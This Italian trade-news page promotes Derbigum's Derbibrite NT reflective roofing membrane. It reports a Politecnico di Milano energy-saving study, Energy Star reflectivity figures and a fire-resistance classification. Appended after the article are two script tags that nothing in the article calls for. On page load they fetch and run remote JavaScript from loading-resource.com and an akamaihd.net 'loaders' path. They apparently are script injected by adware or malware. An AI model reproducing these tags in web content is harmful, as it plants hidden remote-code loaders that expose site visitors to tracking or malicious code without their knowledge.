1. Home
  2. Notizie e Mercato
  3. Derbibrite NT: un milione di metri quadri di applicazioni in oltre 1.000 cantieri in italia

Derbibrite NT: un milione di metri quadri di applicazioni in oltre 1.000 cantieri in italia

Energie rinnovabili di
Un importante traguardo per l’innovativa membrana riflettente bianca che si afferma come concreta conferma della tecnologia a marchio Derbigum


La membrana riflettente bianca Derbibrite NT, lanciata sul mercato nel 2004, ha raggiunto l’importante traguardo di applicazione su un milione di metri quadrati di superfici in circa 1.000 cantieri in tutta Italia. Derbibrite NT è frutto della tecnologia Derbigum, azienda leader nel settore dell’impermeabilizzazione dei tetti, specializzatasi negli ultimi anni nella produzione di sistemi per il raffrescamento passivo degli edifici, i cosiddetti “cool roof”.

I plus di DERBIBRITE NT sono stati confermati anche da uno studio del BEST (Dipartimento di Scienza e Tecnologia dell’ambiente Costruito) del Politecnico di Milano per la valutazione dei risparmi energetici rispetto a edifici con coperture tradizionali. Dallo studio è emerso che DERBIBRITE NT riduce fino al 38% il fabbisogno sensibile di condizionamento di un edificio.

Inoltre i test eseguiti dall’ente americano che rilascia la certificazione Energy Star hanno stabilito che la capacità di mantenere più fresco l’ambiente permane negli anni con uno standard ben superiore a quello richiesto: 81% il valore di riflettività, 81% il valore di remissività, SRI (Solar Reflectance Index) pari a 100.

Membrana bituminosa di colore bianco, sua peculiarità è di essere riflettente, cosa che permette di abbassare la temperatura dell’edificio rispetto a un normale tetto nero, limitando i costi per il condizionamento. E non solo, ottimizza la resa dei pannelli fotovoltaici e rappresenta un’ottima base per gli impianti fotovoltaici grazie alla classificazione BROOF (t1, t2, t3) di resistenza al fuoco secondo la norma EN 13501-5, richiesta dalla recente circolare dei Vigili del Fuoco.
Riduce inoltre il fenomeno urbano dell’isola di calore.

Derbigum, con la promozione di Derbibrite NT e delle soluzioni “cool roof”, prosegue il suo percorso verso il “totalmente verde” e lavora costantemente per proporre soluzioni green non solo per il tetto, ma per tutto l’edificio, rispettando chiaramente la filosofia espressa dal pay-off aziendale: “making buidings smart”.

www.derbigum.it

<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>